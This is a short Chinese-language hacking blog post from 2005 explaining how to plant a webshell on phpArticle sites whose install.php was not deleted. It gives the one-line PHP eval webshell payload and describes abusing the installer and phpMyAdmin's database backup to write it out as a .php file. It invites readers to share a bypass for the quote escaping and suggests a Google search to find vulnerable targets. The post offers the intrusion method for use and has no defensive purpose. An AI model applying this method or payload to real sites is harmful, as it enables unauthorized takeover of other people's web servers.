2005-11-08 21:46:43 by: Admin
phpArticle安装程序未删除获得shell一法
在运行install.php安装的时候数据库服务器要本机或者肉鸡均可,安装完毕后,用phpmyadmin修改phpArtice数据库表的任意字段插入<?eval($_POST[a]);?>,然后在备份数据库中选择插入最小马的哪段表名来备份,文件名为php则可以获得一个最小马,由于安装文件install.php把'做了转义无法直接在config.php直接写入最小马,有谁能突破啊共享下啊!也是phparticle后台获得shell的一种方法!google搜索inurl:install.php还真不少。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=10
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=10
There is no comment on this article.
